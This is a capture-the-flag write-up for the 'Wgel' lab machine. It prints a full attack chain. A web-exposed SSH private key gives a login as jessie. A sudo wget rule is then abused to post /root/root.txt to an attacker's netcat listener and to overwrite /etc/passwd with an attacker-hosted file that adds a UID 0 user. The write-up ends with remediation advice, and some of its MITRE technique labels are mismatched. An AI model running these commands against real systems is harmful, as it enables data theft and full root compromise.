Target IP: wgel.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (jessie) & Root (root.txt)
1. Executive Summary
“Wgel CTF” is a Linux machine that exposes its SSH keys via a misconfigured web server directory. Initial access is obtained by fuzzing the web server, locating a hidden .ssh directory, and downloading the private key for the user jessie. Privilege escalation is achieved by exploiting a misconfiguration in sudoers that allows jessie to run wget as root. This is leveraged to overwrite the /etc/passwd file, creating a new root user or simply exfiltrating the root flag.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Directory Fuzzing.
- T1552.003 (Unsecured Credentials: Bash History/Config): Exposed
.ssh/id_rsaon web server. - T1548.003 (Sudo and Sudo Caching): Exploiting
sudo wget(GTFOBins). - T1003 (OS Credential Dumping): Modifying
/etc/passwdfor persistence.
2. Operational Setup
Host Configuration
echo "10.201.13.97 wgel.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Nmap identifies the standard entry points:
- 22/tcp (SSH): OpenSSH 7.2p2.
- 80/tcp (HTTP): Apache Default Page.
B. Web Enumeration
You performed directory fuzzing (likely with gobuster or ffuf).
- Initial find:
/sitemapdirectory. - Recursive Fuzzing: Inside
/sitemap, you found the crown jewel. - Critical Finding:
http://wgel.thm/sitemap/.ssh/id_rsa
This is a critical misconfiguration. The web server root was likely set to a user’s home directory or a backup folder containing the .ssh keys.
4. Initial Access: The Stolen Key
A. Preparation
We download the key and prepare it for use. SSH requires private keys to have strict permissions (read/write by owner only).
wget http://wgel.thm/sitemap/.ssh/id_rsa
chmod 600 id_rsaB. Login
We guess the username is jessie based on the room description or filename clues (sometimes the pub key comment says jessie@wgel).
ssh -i id_rsa jessie@wgel.thmUser Flag: Located in jessie’s home directory.
5. Privilege Escalation: Sudo Wget
A. Enumeration
We check for sudo privileges immediately.
sudo -lOutput:
User jessie may run the following commands on wgel:
(root) NOPASSWD: /usr/bin/wgetB. The Exploit (GTFOBins)
wget is a file download utility. If run as root, it can write files anywhere on the filesystem (-O flag) or read files and send them to a remote server (--post-file).
You have two main paths to Root here:
Path 1: The Exfiltration (Reading the Flag)
If you just want the flag without a shell:
- Attacker: Start a listener (
nc -lvnp 4444). - Victim:
sudo /usr/bin/wget --post-file=/root/root.txt http://10.10.YOUR.IP:4444- Result: The contents of
root.txtappear in your netcat listener.
Path 2: The Overwrite (Getting a Root Shell)
To get a full shell, we can overwrite /etc/passwd to add a new root user.
- Generate Password Hash:
openssl passwd -1 -salt evil password123
# Output: $1$evil$vM0w... (Example hash)- Create Malicious Passwd File:
Copy the target’s current
/etc/passwdto your machine. Add a new line at the bottom:
hacker:$1$evil$vM0w...:0:0:root:/root:/bin/bash(Note: UID 0 and GID 0 make this user root). 3. Host the File:
python3 -m http.server 80- Overwrite on Target:
sudo /usr/bin/wget http://10.10.YOUR.IP/passwd -O /etc/passwd- Login:
su hacker
# Password: password123Result: root shell.
Root Flag: /root/root.txt.
6. Remediation (Blue Team)
- Web Server Configuration:
- Never set the web root to a user’s home directory.
- Explicitly deny access to dot-files and directories (
.ssh,.bash_history,.git) in the Apache configuration (.htaccessorhttpd.conf).
- Sudo Configuration:
- Do not grant
NOPASSWDsudo rights towget,curl, or any tool that allows arbitrary file writes. - If
wgetis needed for a specific script, restrict the sudo rule to execute only that specific script, not the binary itself.